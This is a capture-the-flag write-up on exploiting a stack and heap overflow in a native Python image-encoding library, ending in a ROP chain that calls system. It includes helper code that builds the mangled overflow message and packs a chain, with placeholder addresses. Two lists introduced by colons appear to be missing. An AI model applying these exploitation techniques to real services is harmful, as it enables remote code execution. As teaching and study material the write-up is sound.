The challenge consisted of a Python service which encodes a user-supplied message in a user-supplied image using a native Python library. Due to missing (wrong) length checks, the binary allowed for buffer overflows on the stack as well as on the heap.
The service runner (service.py) is a forking server, which performs the following operations for each connection:
3.5.2 (default, Nov 23 2017, 16:37:01) \n[GCC 5.4.0 20160609])
The native library (xtproc.so), compiled for x86-64, provides a single function, process, which takes a three-dimensional numpy array for the image data and the message as a bytes object. The function first transforms the image data into a contiguous form and allocates a new output array of the same size, which is returned at the end.
At this point, the function xor_trick is called, which performs the actual transformation. It takes six arguments and is apparently hand-written in assembly. In pseudo-code:
long xor_trick(long width, long height, const char* inbuf, char* outbuf, size_t msglen, const char* msg)
    mangler = "\x2A\x84\x10\x42\x1E\x5C\x14\xC5\x2A\x84\x10\x42\x1E\x5C\x14\xC5"
    buf = alloca(width * height * 3) // size aligned to 16
    for i = 0; i < msglen; i += 16
        buf[i:i+16] = msg[i:i+16] ^ mangler
    for i = 0; i < msglen; i++
        for bit = 0; bit < 8; bit += 2
            r13b:r14b:r15b = inbuf[0:3]
            inbuf += 3
            byte = buf[i] >> bit
            hi = (byte >> 1) & 1
            lo = byte & 1
            if (r13b ^ r14b ^ lo)
                r13b ^= 1
            else if (r14b ^ r15b ^ hi)
                r15b ^= 1
            outbuf[0:3] = r13b:r14b:r15b
            outbuf += 3
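For readers who prefer something executable, the pseudo-code can be modelled in Python. This is only a sketch: the name xor_trick_model is made up here, the conditions are assumed to test just the least significant bit, and the model raises an error where the assembly would run past the end of its buffers.

```python
# 16-byte XOR key taken from the pseudo-code above.
MANGLER = bytes.fromhex("2A8410421E5C14C5" * 2)


def xor_trick_model(inbuf: bytes, msg: bytes) -> bytes:
    """Model of xor_trick: embeds two message bits per RGB pixel.

    Assumption: the branch conditions only look at the lowest bit.
    """
    needed = 12 * len(msg)  # 4 pixels * 3 channels per message byte
    if len(inbuf) < needed:
        # The native code performs no such check; this is where it overflows.
        raise ValueError("image too small for message")

    # First loop: XOR the message with the repeating mangler.
    buf = bytes(b ^ MANGLER[i % 16] for i, b in enumerate(msg))

    out = bytearray()
    pos = 0
    for byte in buf:
        for bit in range(0, 8, 2):
            r13, r14, r15 = inbuf[pos:pos + 3]
            pos += 3
            pair = byte >> bit
            hi = (pair >> 1) & 1
            lo = pair & 1
            if (r13 ^ r14 ^ lo) & 1:
                r13 ^= 1
            elif (r14 ^ r15 ^ hi) & 1:
                r15 ^= 1
            out += bytes((r13, r14, r15))
    return bytes(out)
```

The model makes the size requirement explicit: every message byte consumes and produces 12 bytes of pixel data, regardless of how large the image actually is.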
We can observe two buffer overflows in this code:
This implies that we can easily control rip by supplying an image of dimensions 1x1 and a large enough message (the first 0x48 bytes are ignored or end up in registers). However, note that we always overflow the stack buffer and the heap buffer at the same time.
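The sizes involved can be worked out from the pseudo-code. The sketch below is an illustration, not the original exploit: all function names are hypothetical, the stack buffer is assumed to be rounded up to a multiple of 16, and the 0x48 offset is the one quoted in the text for a 1x1 image. Since xor_trick XORs the message with the mangler before storing it on the stack, the message has to be pre-XORed so that the intended bytes end up there.

```python
# 16-byte XOR key from the pseudo-code.
MANGLER = bytes.fromhex("2A8410421E5C14C5" * 2)
IGNORED = 0x48  # bytes before the saved return address (1x1 image, per the text)


def stack_buf_size(width: int, height: int) -> int:
    """Size of the alloca'd buffer, assuming round-up to 16 bytes."""
    return (width * height * 3 + 15) & ~15


def heap_bytes_written(msglen: int) -> int:
    """Bytes written to outbuf: 4 pixels of 3 bytes per message byte."""
    return 12 * msglen


def mangle(data: bytes) -> bytes:
    """XOR with the repeating mangler, as the first loop does."""
    return bytes(b ^ MANGLER[i % 16] for i, b in enumerate(data))


def build_message(chain: bytes, filler: bytes = b"A") -> bytes:
    """Return a message that leaves filler + chain on the stack after mangling."""
    wanted = filler * IGNORED + chain
    return mangle(wanted)  # XOR is its own inverse
```

For a 1x1 image the stack buffer holds 16 bytes and the output array only 3, so a message of 0x50 bytes writes 0x50 bytes to the stack and 960 bytes to the heap, which is why both overflows always happen together.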
But where to go from here? Even though the server is forking, implying that addresses are the same on different connections, we don’t know the address of the libc or similar. And although we are able to leak some pointers, they are not helpful at all, since we don’t know what they mean.
At this point, we tried to find the binary of the Python interpreter itself, since detailed version information was given. It turned out that the Python3 of an up-to-date Ubuntu 16.04.3 reports exactly the same version identifier, and to our surprise it wasn’t a position-independent executable but was linked at a fixed address.
Our first attempt was to jump to the interpreter loop, first using Py_Main(0, NULL) and then using PyRun_InteractiveLoop(stdin, ""). Unfortunately, stdio was not bound to our socket, which we circumvented by calling dup2(4, 0) and dup2(4, 1) at the beginning of our ROP chain. But alas! For some (unknown) reason, reading from the socket always failed with EAGAIN. Writing to the socket was still possible, though. Then we tried to run PyRun_SimpleString with a string supplied in our message. Again, this didn’t work: we had to smash the heap to get this far (see above), and the interpreter calls free several times, causing the program to abort at some point.
Since it’s impossible to read from the socket, running execve won’t help us either. Fortunately, since the interpreter is a big binary, tons of gadgets are available, allowing us to place a shell command on the stack and call system with its address.
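The general shape of such a chain on x86-64 can be sketched as follows. Everything concrete here is a placeholder: the write-up does not list the gadgets or addresses that were used, nor how the address of the command string was obtained, so system_chain and its parameters are purely illustrative.

```python
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian word, as it would sit on the stack."""
    return struct.pack("<Q", value)


def system_chain(pop_rdi_ret: int, cmd_addr: int, system_addr: int) -> bytes:
    """Minimal chain: load the command pointer into rdi, then return into system.

    All three addresses are hypothetical inputs; they would have to be
    taken from the non-PIE interpreter binary and the actual stack layout.
    """
    return p64(pop_rdi_ret) + p64(cmd_addr) + p64(system_addr)


# Obviously fake values, for illustration only.
chain = system_chain(0x4141414141414141, 0x4242424242424242, 0x4343434343434343)
```

Because xor_trick XORs the message with the mangler before it reaches the stack, a chain like this would still have to be XORed with the same key before being sent.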